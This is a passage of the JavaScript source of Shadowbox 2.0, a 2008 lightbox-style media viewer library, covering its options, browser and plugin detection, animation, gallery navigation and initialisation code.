File: shadowbox.js
/** * The Shadowbox class. * * This file is part of Shadowbox. * * Shadowbox is an online media viewer application that supports all of the * web's most popular media publishing formats. Shadowbox is written entirely * in JavaScript and CSS and is highly customizable. Using Shadowbox, website * authors can showcase a wide assortment of media in all major browsers without * navigating users away from the linking page. * * Shadowbox is released under version 3.0 of the Creative Commons Attribution- * Noncommercial-Share Alike license. This means that it is absolutely free * for personal, noncommercial use provided that you 1) make attribution to the * author and 2) release any derivative work under the same or a similar * license. * * If you wish to use Shadowbox for commercial purposes, licensing information * can be found at http://mjijackson.com/shadowbox/. * * @author Michael J. I. Jackson <mjijackson@gmail.com> * @copyright 2007-2008 Michael J. I. Jackson * @license http://creativecommons.org/licenses/by-nc-sa/3.0/ * @version SVN: $Id: shadowbox.js 108 2008-07-11 04:19:01Z mjijackson $ */ if(typeof Shadowbox == 'undefined'){ throw 'Unable to load Shadowbox, no base library adapter found'; } /** * The Shadowbox class. Used to display different media on a web page using a * Lightbox-like effect. * * Useful resources: * * - http://www.alistapart.com/articles/byebyeembed * - http://www.w3.org/TR/html401/struct/objects.html * - http://www.dyn-web.com/dhtml/iframes/ * - http://www.apple.com/quicktime/player/specs.html * - http://www.apple.com/quicktime/tutorials/embed2.html * - http://www.howtocreate.co.uk/wrongWithIE/?chapter=navigator.plugins * - http://msdn.microsoft.com/en-us/library/ms532969.aspx * - http://support.microsoft.com/kb/316992 * * @class Shadowbox * @author Michael J. I. Jackson <mjijackson@gmail.com> * @singleton */ (function(){ /** * The current version of Shadowbox. * * @var String * @private */ var version = '2.0'; /** * Contains the default options for Shadowbox. * * @var Object * @private */ var options = { /** * Enable all animations besides fades. * * @var Boolean */ animate: true, /** * Enable fade animations. * * @var Boolean */ animateFade: true, /** * Specifies the sequence of the height and width animations. May be * 'wh' (width then height), 'hw' (height then width), or 'sync' (both * at the same time). Of course this will only work if animate is true. * * @var String */ animSequence: 'wh', /** * The path to flvplayer.swf. * * @var String */ flvPlayer: 'flvplayer.swf', /** * Listen to the overlay for clicks. If the user clicks the overlay, * it will trigger Shadowbox.close(). * * @var Boolean */ modal: false, /** * The color to use for the modal overlay (in hex). * * @var String */ overlayColor: '#000', /** * The opacity to use for the modal overlay. * * @var Number */ overlayOpacity: 0.8, /** * The default background color to use for Flash movies (in hex). * * @var String */ flashBgColor: '#000000', /** * Automatically play movies. * * @var Boolean */ autoplayMovies: true, /** * Enable movie controllers on movie players. * * @var Boolean */ showMovieControls: true, /** * A delay (in seconds) to use for slideshows. If set to anything other * than 0, this value determines an interval at which Shadowbox will * automatically proceed to the next piece in the gallery. * * @var Number */ slideshowDelay: 0, /** * The duration of the resizing animations (in seconds). * * @var Number */ resizeDuration: 0.55, /** * The duration of the fading animations (in seconds). * * @var Number */ fadeDuration: 0.35, /** * Show the navigation controls. * * @var Boolean */ displayNav: true, /** * Enable continuous galleries. When this is true, users will be able * to skip to the first gallery image from the last using next and vice * versa. * * @var Boolean */ continuous: false, /** * Display the gallery counter. * * @var Boolean */ displayCounter: true, /** * This option may be either 'default' or 'skip'. The default counter is * a simple '1 of 5' message. The skip counter displays a link for each * piece in the gallery that enables a user to skip directly to any * piece. * * @var String */ counterType: 'default', /** * Limits the number of counter links that will be displayed in a "skip" * style counter. If the actual number of gallery elements is greater * than this value, the counter will be restrained to the elements * immediately preceeding and following the current element. * * @var Number */ counterLimit: 10, /** * The amount of padding to maintain around the viewport edge (in * pixels). This only applies when the image is very large and takes up * the entire viewport. * * @var Number */ viewportPadding: 20, /** * How to handle content that is too large to display in its entirety * (and is resizable). A value of 'resize' will resize the content while * preserving aspect ratio and display it at the smaller resolution. If * the content is an image, a value of 'drag' will display the image at * its original resolution but it will be draggable within Shadowbox. A * value of 'none' will display the content at its original resolution * but it may be cropped. * * @var String */ handleOversize: 'resize', /** * An exception handling function that will be called whenever * Shadowbox should throw an exception. Will be passed the error * message as its first argument. * * @var Function */ handleException: null, /** * The mode to use when handling unsupported media. May be either * 'remove' or 'link'. If it is 'remove', the unsupported gallery item * will merely be removed from the gallery. If it is the only item in * the gallery, the link will simply be followed. If it is 'link', a * link will be provided to the appropriate plugin page in place of the * gallery element. * * @var String */ handleUnsupported: 'link', /** * The initial height of Shadowbox (in pixels). * * @var Number */ initialHeight: 160, /** * The initial width of Shadowbox (in pixels). * * @var Number */ initialWidth: 320, /** * Enable keyboard control. * * @var Boolean */ enableKeys: true, /** * A hook function to be fired when Shadowbox opens. The single argument * will be the current gallery element. * * @var Function */ onOpen: null, /** * A hook function to be fired when Shadowbox finishes loading its * content. The single argument will be the current gallery element on * display. * * @var Function */ onFinish: null, /** * A hook function to be fired when Shadowbox changes from one gallery * element to the next. The single argument will be the current gallery * element that is about to be displayed. * * @var Function */ onChange: null, /** * A hook function that will be fired when Shadowbox closes. The single * argument will be the gallery element most recently displayed. * * @var Function */ onClose: null, /** * Skips calling Shadowbox.setup() in init(). This means that it must * be called later manually. * * @var Boolean */ skipSetup: false, /** * An object containing names of plugins and links to their respective * download pages. * * @var Object */ errors: { fla: { name: 'Flash', url: 'http://www.adobe.com/products/flashplayer/' }, qt: { name: 'QuickTime', url: 'http://www.apple.com/quicktime/download/' }, wmp: { name: 'Windows Media Player', url: 'http://www.microsoft.com/windows/windowsmedia/' }, f4m: { name: 'Flip4Mac', url: 'http://www.flip4mac.com/wmv_download.htm' } }, /** * A map of players to the file extensions they support. Each member of * this object is the name of a player (with one exception), whose value * is an array of file extensions that player will "play". The one * exception to this rule is the "qtwmp" member, which contains extensions * that may be played using either QuickTime or Windows Media Player. * * - img: Image file extensions * - swf: Flash SWF file extensions * - flv: Flash video file extensions (will be played by JW FLV player) * - qt: Movie file extensions supported by QuickTime * - wmp: Movie file extensions supported by Windows Media Player * - qtwmp: Movie file extensions supported by both QuickTime and Windows Media Player * - iframe: File extensions that will be display in an iframe * * IMPORTANT: If this object is to be modified, it must be copied in its * entirety and tweaked because it is not merged recursively with the * default. Also, any modifications must be passed into Shadowbox.init * for speed reasons. * * @var Object ext */ ext: { img: ['png', 'jpg', 'jpeg', 'gif', 'bmp'], swf: ['swf'], flv: ['flv'], qt: ['dv', 'mov', 'moov', 'movie', 'mp4'], wmp: ['asf', 'wm', 'wmv'], qtwmp: ['avi', 'mpg', 'mpeg'], iframe: ['asp', 'aspx', 'cgi', 'cfm', 'htm', 'html', 'pl', 'php', 'php3', 'php4', 'php5', 'phtml', 'rb', 'rhtml', 'shtml', 'txt', 'vbs'] } }; // shorthand var SB = Shadowbox; var SL = SB.lib; /** * Stores the default set of options in case a custom set of options is used * on a link-by-link basis so we can restore them later. * * @var Object * @private */ var default_options; /** * An object containing some regular expressions we'll need later. Compiled * up front for speed. * * @var Object * @private */ var RE = { domain: /:\/\/(.*?)[:\/]/, // domain prefix inline: /#(.+)$/, // inline element id rel: /^(light|shadow)box/i, // rel attribute format gallery: /^(light|shadow)box\[(.*?)\]/i, // rel attribute format for gallery link unsupported: /^unsupported-(\w+)/, // unsupported media type param: /\s*([a-z_]*?)\s*=\s*(.+)\s*/, // rel string parameter empty: /^(?:br|frame|hr|img|input|link|meta|range|spacer|wbr|area|param|col)$/i // elements that don't have children }; /** * A cache of options for links that have been set up for use with * Shadowbox. * * @var Array * @private */ var cache = []; /** * An array containing the gallery objects currently being viewed. In the * case of non-gallery items, this will only hold one object. * * @var Array * @private */ var gallery; /** * The array index of the current gallery that is currently being viewed. * * @var Number * @private */ var current; /** * The current content object. * * @var Object * @private */ var content; /** * The id to use for content objects. * * @var String * @private */ var content_id = 'shadowbox_content'; /** * Holds the current dimensions of Shadowbox as calculated by * setDimensions(). Contains the following properties: * * - height: The total height of #shadowbox * - width: The total width of #shadowbox * - inner_h: The height of #shadowbox_body * - inner_w: The width of #shadowbox_body * - top: The top to use for #shadowbox * - resize_h: The height to use for resizable content * - resize_w: The width to use for resizable content * - drag: True if dragging should be enabled (oversized image) * * @var Object * @private */ var dims; /** * Keeps track of whether or not Shadowbox has been initialized. We never * want to initialize twice. * * @var Boolean * @private */ var initialized = false; /** * Keeps track of whether or not Shadowbox is activated. * * @var Boolean * @private */ var activated = false; /** * The timeout id for the slideshow transition function. * * @var Number * @private */ var slide_timer; /** * Keeps track of the time at which the current slideshow frame was * displayed. * * @var Number * @private */ var slide_start; /** * The delay on which the next slide will display. * * @var Number * @private */ var slide_delay = 0; /** * These parameters for simple browser detection. Adapted from Ext.js. * * @var Object * @private */ var ua = navigator.userAgent.toLowerCase(); var client = { isStrict: document.compatMode == 'CSS1Compat', isOpera: ua.indexOf('opera') > -1, isIE: ua.indexOf('msie') > -1, isIE7: ua.indexOf('msie 7') > -1, isSafari: /webkit|khtml/.test(ua), isWindows: ua.indexOf('windows') != -1 || ua.indexOf('win32') != -1, isMac: ua.indexOf('macintosh') != -1 || ua.indexOf('mac os x') != -1, isLinux: ua.indexOf('linux') != -1 }; client.isBorderBox = client.isIE && !client.isStrict; client.isSafari3 = client.isSafari && !!(document.evaluate); client.isGecko = ua.indexOf('gecko') != -1 && !client.isSafari; /** * You're not sill using IE6 are you? * * @var Boolean * @private */ var ltIE7 = client.isIE && !client.isIE7; /** * Contains plugin support information. Each property of this object is a * boolean indicating whether that plugin is supported. * * - fla: Flash player * - qt: QuickTime player * - wmp: Windows Media player * - f4m: Flip4Mac plugin * * @var Object * @private */ var plugins; // detect plugin support if(navigator.plugins && navigator.plugins.length){ var detectPlugin = function(plugin_name){ var detected = false; for (var i = 0, len = navigator.plugins.length; i < len; ++i){ if(navigator.plugins[i].name.indexOf(plugin_name) > -1){ detected = true; break; } } return detected; }; var f4m = detectPlugin('Flip4Mac'); plugins = { fla: detectPlugin('Shockwave Flash'), qt: detectPlugin('QuickTime'), wmp: !f4m && detectPlugin('Windows Media'), // if it's Flip4Mac, it's not really WMP f4m: f4m }; }else{ var detectPlugin = function(plugin_name){ var detected = false; try{ var axo = new ActiveXObject(plugin_name); if(axo) detected = true; }catch(e){} return detected; }; plugins = { fla: detectPlugin('ShockwaveFlash.ShockwaveFlash'), qt: detectPlugin('QuickTime.QuickTime'), wmp: detectPlugin('wmplayer.ocx'), f4m: false }; } /** * Applies all properties of e to o. * * @param Object o The original object * @param Object e The extension object * @return Object The original object with all properties * of the extension object applied * @private */ var apply = function(o, e){ for(var p in e) o[p] = e[p]; return o; }; /** * Determines if the given object is an anchor/area element. * * @param mixed el The object to check * @return Boolean True if the object is a link element * @private */ var isLink = function(el){ return el && typeof el.tagName == 'string' && (el.tagName.toUpperCase() == 'A' || el.tagName.toUpperCase() == 'AREA'); }; /** * Gets the height of the viewport in pixels. Note: This function includes * scrollbars in Safari 3. * * @return Number The height of the viewport * @public * @static */ SL.getViewportHeight = function(){ var h = window.innerHeight; // Safari var mode = document.compatMode; if((mode || client.isIE) && !client.isOpera){ h = client.isStrict ? document.documentElement.clientHeight : document.body.clientHeight; } return h; }; /** * Gets the width of the viewport in pixels. Note: This function includes * scrollbars in Safari 3. * * @return Number The width of the viewport * @public * @static */ SL.getViewportWidth = function(){ var w = window.innerWidth; // Safari var mode = document.compatMode; if(mode || client.isIE){ w = client.isStrict ? document.documentElement.clientWidth : document.body.clientWidth; } return w; }; /** * Creates an HTML string from an object representing HTML elements. Based * on Ext.DomHelper's createHtml. * * @param Object obj The HTML definition object * @return String An HTML string * @public * @static */ SL.createHTML = function(obj){ var html = '<' + obj.tag; for(var attr in obj){ if(attr == 'tag' || attr == 'html' || attr == 'children') continue; if(attr == 'cls'){ html += ' class="' + obj['cls'] + '"'; }else{ html += ' ' + attr + '="' + obj[attr] + '"'; } } if(RE.empty.test(obj.tag)){ html += '/>'; }else{ html += '>'; var cn = obj.children; if(cn){ for(var i = 0, len = cn.length; i < len; ++i){ html += this.createHTML(cn[i]); } } if(obj.html) html += obj.html; html += '</' + obj.tag + '>'; } return html; }; /** * Easing function used for animations. Based on a cubic polynomial. * * @param Number x The state of the animation (% complete) * @return Number The adjusted easing value * @private * @static */ var ease = function(x){ return 1 + Math.pow(x - 1, 3); }; /** * Animates any numeric (not color) style of the given element from its * current state to the given value. Defaults to using pixel-based * measurements. * * @param HTMLElement el The DOM element to animate * @param String p The property to animate (in camelCase) * @param mixed to The value to animate to * @param Number d The duration of the animation (in * seconds) * @param Function cb A callback function to call when the * animation completes * @return void * @private * @static */ var animate = function(el, p, to, d, cb){ var from = parseFloat(SL.getStyle(el, p)); if(isNaN(from)) from = 0; if(from == to){ if(typeof cb == 'function') cb(); return; // nothing to animate } var delta = to - from; var op = p == 'opacity'; var unit = op ? '' : 'px'; // default unit is px var fn = function(ease){ SL.setStyle(el, p, from + ease * delta + unit); }; // cancel the animation here if set in the options if(!options.animate && !op || op && !options.animateFade){ fn(1); if(typeof cb == 'function') cb(); return; } d *= 1000; // convert to milliseconds var begin = new Date().getTime(); var end = begin + d; var timer = setInterval(function(){ var time = new Date().getTime(); if(time >= end){ // end of animation clearInterval(timer); fn(1); if(typeof cb == 'function') cb(); }else{ fn(ease((time - begin) / d)); } }, 10); // 10 ms interval is minimum on WebKit }; /** * A utility function used by the fade functions to clear the opacity * style setting of the given element. Required in some cases for IE. * * @param HTMLElement el The DOM element * @return void * @private */ var clearOpacity = function(el){ var s = el.style; if(client.isIE){ if(typeof s.filter == 'string' && (/alpha/i).test(s.filter)){ // careful not to overwrite other filters! s.filter = s.filter.replace(/[\w\.]*alpha\(.*?\);?/i, ''); } }else{ s.opacity = ''; s['-moz-opacity'] = ''; s['-khtml-opacity'] = ''; } }; /** * Gets the computed height of the given element, including padding and * borders. * * @param HTMLElement el The element * @return Number The computed height of the element * @private */ var getComputedHeight = function(el){ var h = Math.max(el.offsetHeight, el.clientHeight); if(!h){ h = parseInt(SL.getStyle(el, 'height'), 10) || 0; if(!client.isBorderBox){ h += parseInt(SL.getStyle(el, 'padding-top'), 10) + parseInt(SL.getStyle(el, 'padding-bottom'), 10) + parseInt(SL.getStyle(el, 'border-top-width'), 10) + parseInt(SL.getStyle(el, 'border-bottom-width'), 10); } } return h; }; /** * Determines the player needed to display the file at the given URL. If * the file type is not supported, the return value will be 'unsupported'. * If the file type is not supported but the correct player can be * determined, the return value will be 'unsupported-*' where * will be the * player abbreviation (e.g. 'qt' = QuickTime). * * @param String url The url of the file * @return String The name of the player to use * @private */ var getPlayer = function(url){ var m = url.match(RE.domain); var d = m && document.domain == m[1]; // same domain if(url.indexOf('#') > -1 && d) return 'inline'; var q = url.indexOf('?'); if(q > -1) url = url.substring(0, q); // strip query string for player detection purposes if(RE.img.test(url)) return 'img'; if(RE.swf.test(url)) return plugins.fla ? 'swf' : 'unsupported-swf'; if(RE.flv.test(url)) return plugins.fla ? 'flv' : 'unsupported-flv'; if(RE.qt.test(url)) return plugins.qt ? 'qt' : 'unsupported-qt'; if(RE.wmp.test(url)){ if(plugins.wmp) return 'wmp'; if(plugins.f4m) return 'qt'; if(client.isMac) return plugins.qt ? 'unsupported-f4m' : 'unsupported-qtf4m'; return 'unsupported-wmp'; }else if(RE.qtwmp.test(url)){ if(plugins.qt) return 'qt'; if(plugins.wmp) return 'wmp'; return client.isMac ? 'unsupported-qt' : 'unsupported-qtwmp'; }else if(!d || RE.iframe.test(url)){ return 'iframe'; } return 'unsupported'; // same domain, not supported }; /** * Handles all clicks on links that have been set up to work with Shadowbox * and cancels the default event behavior when appropriate. * * @param {Event} ev The click event object * @return void * @private */ var handleClick = function(ev){ // get anchor/area element var link; if(isLink(this)){ link = this; // jQuery, Prototype, YUI }else{ link = SL.getTarget(ev); // Ext, standalone while(!isLink(link) && link.parentNode){ link = link.parentNode; } } //SL.preventDefault(ev); // good for debugging if(link){ SB.open(link); if(gallery.length) SL.preventDefault(ev); // stop event } }; /** * Toggles the display of the nav control with the given id on and off. * * @param String id The id of the navigation control * @param Boolean on True to toggle on, false to toggle off * @return void * @private */ var toggleNav = function(id, on){ var el = SL.get('shadowbox_nav_' + id); if(el) el.style.display = on ? '' : 'none'; }; /** * Builds the content for the title and information bars. * * @param Function cb A callback function to execute after the * bars are built * @return void * @private */ var buildBars = function(cb){ var obj = gallery[current]; var title_i = SL.get('shadowbox_title_inner'); // build the title title_i.innerHTML = obj.title || ''; // build the nav var nav = SL.get('shadowbox_nav'); if(nav){ var c, n, pl, pa, p; // need to build the nav? if(options.displayNav){ c = true; // next & previous links var len = gallery.length; if(len > 1){ if(options.continuous){ n = p = true; // show both }else{ n = (len - 1) > current; // not last in gallery, show next p = current > 0; // not first in gallery, show previous } } // in a slideshow? if(options.slideshowDelay > 0 && hasNext()){ pa = slide_timer != 'paused'; pl = !pa; } }else{ c = n = pl = pa = p = false; } toggleNav('close', c); toggleNav('next', n); toggleNav('play', pl); toggleNav('pause', pa); toggleNav('previous', p); } // build the counter var counter = SL.get('shadowbox_counter'); if(counter){ var co = ''; // need to build the counter? if(options.displayCounter && gallery.length > 1){ if(options.counterType == 'skip'){ // limit the counter? var i = 0, len = gallery.length, end = len; var limit = parseInt(options.counterLimit); if(limit < len){ // support large galleries var h = Math.round(limit / 2); i = current - h; if(i < 0) i += len; end = current + (limit - h); if(end > len) end -= len; } while(i != end){ if(i == len) i = 0; co += '<a onclick="Shadowbox.change(' + i + ');"'; if(i == current) co += ' class="shadowbox_counter_current"'; co += '>' + (++i) + '</a>'; } }else{ // default co = (current + 1) + ' ' + SB.LANG.of + ' ' + len; } } counter.innerHTML = co; } cb(); }; /** * Hides the title and info bars. * * @param Boolean anim True to animate the transition * @param Function cb A callback function to execute after the * animation completes * @return void * @private */ var hideBars = function(anim, cb){ var obj = gallery[current]; var title = SL.get('shadowbox_title'); var info = SL.get('shadowbox_info'); var title_i = SL.get('shadowbox_title_inner'); var info_i = SL.get('shadowbox_info_inner'); // build bars after they are hidden var fn = function(){ buildBars(cb); }; var title_h = getComputedHeight(title); var info_h = getComputedHeight(info) * -1; if(anim){ // animate the transition animate(title_i, 'margin-top', title_h, 0.35); animate(info_i, 'margin-top', info_h, 0.35, fn); }else{ SL.setStyle(title_i, 'margin-top', title_h + 'px'); SL.setStyle(info_i, 'margin-top', info_h + 'px'); fn(); } }; /** * Shows the title and info bars. * * @param Function cb A callback function to execute after the * animation completes * @return void * @private */ var showBars = function(cb){ var title_i = SL.get('shadowbox_title_inner'); var info_i = SL.get('shadowbox_info_inner'); var t = title_i.innerHTML != ''; // is there a title to display? if(t) animate(title_i, 'margin-top', 0, 0.35); animate(info_i, 'margin-top', 0, 0.35, cb); }; /** * Loads the Shadowbox with the current piece. * * @return void * @private */ var loadContent = function(){ var obj = gallery[current]; if(!obj) return; // invalid var changing = false; if(content){ content.remove(); // remove old content first changing = true; // changing from some previous content } // determine player, inline is really just HTML var p = obj.player == 'inline' ? 'html' : obj.player; // make sure player is loaded if(typeof SB[p] != 'function'){ SB.raise('Unknown player ' + obj.player); } content = new SB[p](content_id, obj); // instantiate new content object listenKeys(false); // disable the keyboard temporarily toggleLoading(true); hideBars(changing, function(){ // if changing, animate the bars transition if(!content) return; // if opening, clear #shadowbox display if(!changing){ SL.get('shadowbox').style.display = ''; } var fn = function(){ resizeContent(function(){ if(!content) return; showBars(function(){ if(!content) return; // append content just before hiding the loading layer SL.get('shadowbox_body_inner').innerHTML = SL.createHTML(content.markup(dims)); toggleLoading(false, function(){ if(!content) return; if(typeof content.onLoad == 'function'){ content.onLoad(); // call onLoad callback if present } if(options.onFinish && typeof options.onFinish == 'function'){ options.onFinish(gallery[current]); // fire onFinish handler } if(slide_timer != 'paused'){ SB.play(); // kick off next slide } listenKeys(true); // re-enable the keyboard }); }); }); }; if(typeof content.ready != 'undefined'){ // does the object have a ready property? var id = setInterval(function(){ // if so, wait for the object to be ready if(content){ if(content.ready){ clearInterval(id); // clean up id = null; fn(); } }else{ // content has been removed clearInterval(id); id = null; } }, 100); }else{ fn(); } }); // preload neighboring gallery images if(gallery.length > 1){ var next = gallery[current + 1] || gallery[0]; if(next.player == 'img'){ var a = new Image(); a.src = next.content; } var prev = gallery[current - 1] || gallery[gallery.length - 1]; if(prev.player == 'img'){ var b = new Image(); b.src = prev.content; } } }; /** * Calculates the dimensions for Shadowbox, taking into account the borders * and surrounding elements of the shadowbox_body. If the height/width * combination is too large for Shadowbox and handleOversize option is set * to 'resize', the resized dimensions will be returned (preserving the * original aspect ratio). Otherwise, the originally calculated dimensions * will be used. Stores all dimensions in the private dims variable. * * @param Number height The content player height * @param Number width The content player width * @param Boolean resizable True if the content is able to be * resized. Defaults to false. * @return void * @private */ var setDimensions = function(height, width, resizable){ resizable = resizable || false; var sb = SL.get('shadowbox_body'); var h = height = parseInt(height); var w = width = parseInt(width); var view_h = SL.getViewportHeight(); var view_w = SL.getViewportWidth(); // calculate the max width var border_w = parseInt(SL.getStyle(sb, 'border-left-width'), 10) + parseInt(SL.getStyle(sb, 'border-right-width'), 10); var extra_w = border_w + 2 * options.viewportPadding; if(w + extra_w >= view_w){ w = view_w - extra_w; } // calculate the max height var border_h = parseInt(SL.getStyle(sb, 'border-top-width'), 10) + parseInt(SL.getStyle(sb, 'border-bottom-width'), 10); var bar_h = getComputedHeight(SL.get('shadowbox_title')) + getComputedHeight(SL.get('shadowbox_info')); var extra_h = border_h + 2 * options.viewportPadding + bar_h; if(h + extra_h >= view_h){ h = view_h - extra_h; } // handle oversized content var drag = false; var resize_h = height; var resize_w = width; var handle = options.handleOversize; if(resizable && (handle == 'resize' || handle == 'drag')){ var change_h = (height - h) / height; var change_w = (width - w) / width; if(handle == 'resize'){ if(change_h > change_w){ w = Math.round((width / height) * h); }else if(change_w > change_h){ h = Math.round((height / width) * w); } // adjust resized height or width accordingly resize_w = w; resize_h = h; }else{ // drag on oversized images only var link = gallery[current]; if(link) drag = link.player == 'img' && (change_h > 0 || change_w > 0); } } // update dims dims = { height: h + border_h + bar_h, width: w + border_w, inner_h: h, inner_w: w, top: (view_h - (h + extra_h)) / 2 + options.viewportPadding, resize_h: resize_h, resize_w: resize_w, drag: drag }; }; /** * Resizes Shadowbox to the given height and width. If the callback * parameter is given, the transition will be animated and the callback * function will be called when the animation completes. Note: The private * content variable must be updated before calling this function. * * @param Function cb A callback function to execute after the * content has been resized * @return void * @private */ var resizeContent = function(cb){ if(!content) return; // no content // set new dimensions setDimensions(content.height, content.width, content.resizable); if(cb){ switch(options.animSequence){ case 'hw': adjustHeight(dims.inner_h, dims.top, true, function(){ adjustWidth(dims.width, true, cb); }); break; case 'wh': adjustWidth(dims.width, true, function(){ adjustHeight(dims.inner_h, dims.top, true, cb); }); break; case 'sync': default: adjustWidth(dims.width, true); adjustHeight(dims.inner_h, dims.top, true, cb); } }else{ // window resize adjustWidth(dims.width, false); adjustHeight(dims.inner_h, dims.top, false); var c = SL.get(content_id); if(c){ // resize resizable content when in resize mode if(content.resizable && options.handleOversize == 'resize'){ c.height = dims.resize_h; c.width = dims.resize_w; } // fix draggable positioning if enlarging viewport if(gallery[current].player == 'img' && options.handleOversize == 'drag'){ var top = parseInt(SL.getStyle(c, 'top')); if(top + content.height < dims.inner_h){ SL.setStyle(c, 'top', dims.inner_h - content.height + 'px'); } var left = parseInt(SL.getStyle(c, 'left')); if(left + content.width < dims.inner_w){ SL.setStyle(c, 'left', dims.inner_w - content.width + 'px'); } } } } }; /** * Adjusts the height of #shadowbox_body and centers #shadowbox vertically * in the viewport. * * @param Number height The height to use for #shadowbox_body * @param Number top The top to use for #shadowbox * @param Boolean anim True to animate the transition * @param Function cb A callback to use when the animation * completes * @return void * @private */ var adjustHeight = function(height, top, anim, cb){ height = parseInt(height); // adjust the height var sb = SL.get('shadowbox_body'); if(anim){ animate(sb, 'height', height, options.resizeDuration); }else{ SL.setStyle(sb, 'height', height + 'px'); } // adjust the top var s = SL.get('shadowbox'); if(anim){ animate(s, 'top', top, options.resizeDuration, cb); }else{ SL.setStyle(s, 'top', top + 'px'); if(typeof cb == 'function') cb(); } }; /** * Adjusts the width of #shadowbox. * * @param Number width The width to use for #shadowbox * @param Boolean anim True to animate the transition * @param Function cb A callback to use when the animation * completes * @return void * @private */ var adjustWidth = function(width, anim, cb){ width = parseInt(width); // adjust the width var s = SL.get('shadowbox'); if(anim){ animate(s, 'width', width, options.resizeDuration, cb); }else{ SL.setStyle(s, 'width', width + 'px'); if(typeof cb == 'function') cb(); } }; /** * Sets up a listener on the document for keystrokes. * * @param Boolean on True to enable the listener, false to turn * it off * @return void * @private */ var listenKeys = function(on){ if(!options.enableKeys) return; SL[(on ? 'add' : 'remove') + 'Event'](document, 'keydown', handleKey); }; /** * A listener function that is fired when a key is pressed. * * @param mixed e The event object * @return void * @private */ var handleKey = function(e){ var code = SL.keyCode(e); // attempt to prevent default key action SL.preventDefault(e); if(code == 81 || code == 88 || code == 27){ // q, x, or esc SB.close(); }else if(code == 37){ // left arrow SB.previous(); }else if(code == 39){ // right arrow SB.next(); }else if(code == 32){ // space bar SB[(typeof slide_timer == 'number' ? 'pause' : 'play')](); } }; /** * Toggles the visibility of the "loading" layer. * * @param Boolean on True to toggle on, false to toggle off * @param Function cb The callback function to call when toggling * completes * @return void * @private */ var toggleLoading = function(on, cb){ var loading = SL.get('shadowbox_loading'); if(on){ loading.style.display = ''; if(typeof cb == 'function') cb(); }else{ var p = gallery[current].player; var anim = (p == 'img' || p == 'html'); // fade on images & html var fn = function(){ loading.style.display = 'none'; clearOpacity(loading); if(typeof cb == 'function') cb(); }; if(anim){ animate(loading, 'opacity', 0, options.fadeDuration, fn); }else{ fn(); } } }; /** * Sets the top of the container element. This is only necessary in IE6 * where the container uses absolute positioning instead of fixed. * * @return void * @private */ var fixTop = function(){ SL.get('shadowbox_container').style.top = document.documentElement.scrollTop + 'px'; }; /** * Sets the height of the overlay element to the full viewport height. This * is only necessary in IE6 where the container uses absolute positioning * instead of fixed, thus restricting the size of the overlay element. * * @return void * @private */ var fixHeight = function(){ SL.get('shadowbox_overlay').style.height = SL.getViewportHeight() + 'px'; }; /** * Determines if there is a next piece to display in the current gallery. * * @return bool True if there is another piece, false otherwise * @private */ var hasNext = function(){ return gallery.length > 1 && (current != gallery.length - 1 || options.continuous); }; /** * Toggles the visibility of #shadowbox_container and sets its size (if on * IE6). Also toggles the visibility of elements (<select>, <object>, and * <embed>) that are troublesome for semi-transparent modal overlays. IE has * problems with <select> elements, while Firefox has trouble with * <object>s. * * @param Function cb A callback to call after toggling on, absent * when toggling off * @return void * @private */ var toggleVisible = function(cb){ var els, v = (cb) ? 'hidden' : 'visible'; var hide = ['select', 'object', 'embed']; // tags to hide for(var i = 0; i < hide.length; ++i){ els = document.getElementsByTagName(hide[i]); for(var j = 0, len = els.length; j < len; ++j){ els[j].style.visibility = v; } } // resize & show container var so = SL.get('shadowbox_overlay'); var sc = SL.get('shadowbox_container'); var sb = SL.get('shadowbox'); if(cb){ // set overlay color/opacity SL.setStyle(so, { backgroundColor: options.overlayColor, opacity: 0 }); if(!options.modal) SL.addEvent(so, 'click', SB.close); if(ltIE7){ // fix container top & overlay height before showing fixTop(); fixHeight(); SL.addEvent(window, 'scroll', fixTop); } // fade in animation sb.style.display = 'none'; // will be cleared in loadContent() sc.style.visibility = 'visible'; animate(so, 'opacity', parseFloat(options.overlayOpacity), options.fadeDuration, cb); }else{ SL.removeEvent(so, 'click', SB.close); if(ltIE7) SL.removeEvent(window, 'scroll', fixTop); // fade out effect sb.style.display = 'none'; animate(so, 'opacity', 0, options.fadeDuration, function(){ sc.style.visibility = 'hidden'; sb.style.display = ''; clearOpacity(so); }); } }; /** * Initializes the Shadowbox environment. Loads the skin (if necessary), * compiles the player matching regular expressions, and sets up the * window resize listener. * * @param Object opts (optional) The default options to use * @return void * @public * @static */ Shadowbox.init = function(opts){ // don't initialize twice if(initialized) return; // make sure language is loaded if(typeof SB.LANG == 'undefined'){ SB.raise('No Shadowbox language loaded'); return; } // make sure skin is loaded if(typeof SB.SKIN == 'undefined'){ SB.raise('No Shadowbox skin loaded'); return; } // apply custom options apply(options, opts || {}); // add markup var markup = SB.SKIN.markup.replace(/\{(\w+)\}/g, function(m, p){ return SB.LANG[p]; }); var bd = document.body || document.documentElement; SL.append(bd, markup); // several fixes for IE6 if(ltIE7){ // give the container absolute positioning SL.setStyle(SL.get('shadowbox_container'), 'position', 'absolute'); // give shadowbox_body "layout"...whatever that is SL.get('shadowbox_body').style.zoom = 1; // use AlphaImageLoader for transparent PNG support var png = SB.SKIN.png_fix; if(png && png.constructor == Array){ for(var i = 0; i < png.length; ++i){ var el = SL.get(png[i]); if(el){ var match = SL.getStyle(el, 'background-image').match(/url\("(.*\.png)"\)/); if(match){ SL.setStyle(el, { backgroundImage: 'none', filter: 'progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src=' + match[1] + ',sizingMethod=scale);' }); } } } } } // compile file type regular expressions here for speed for(var e in options.ext){ RE[e] = new RegExp('\.(' + options.ext[e].join('|') + ')\s*$', 'i'); } // set up window resize event handler var id; SL.addEvent(window, 'resize', function(){ // use 50 ms event buffering to prevent jerky window resizing if(id){ clearTimeout(id); id = null; } id = setTimeout(function(){ if(ltIE7) fixHeight(); resizeContent(); }, 50); }); if(!options.skipSetup) SB.setup(); initialized = true; }; /** * Dynamically loads the specified skin for use with Shadowbox. If the skin * is included already in the page via the appropriate <script> and <link> * tags, this function does not need to be called. Otherwise, this function * must be called before window.onload. * * @param String skin The directory where the skin is located * @param String dir The directory where the Shadowbox skin * files are located * @return void * @public * @static */ Shadowbox.loadSkin = function(skin, dir){ if(!(/\/$/.test(dir))) dir += '/'; skin = dir + skin + '/'; // Safari 2.0 fails using DOM, use document.write instead document.write('<link rel="stylesheet" type="text/css" href="' + skin + 'skin.css">'); document.write('<scr' + 'ipt type="text/javascript" src="' + skin + 'skin.js"><\/script>'); }; /** * Dynamically loads the specified language file to be used with Shadowbox. * If the language file is included already in the 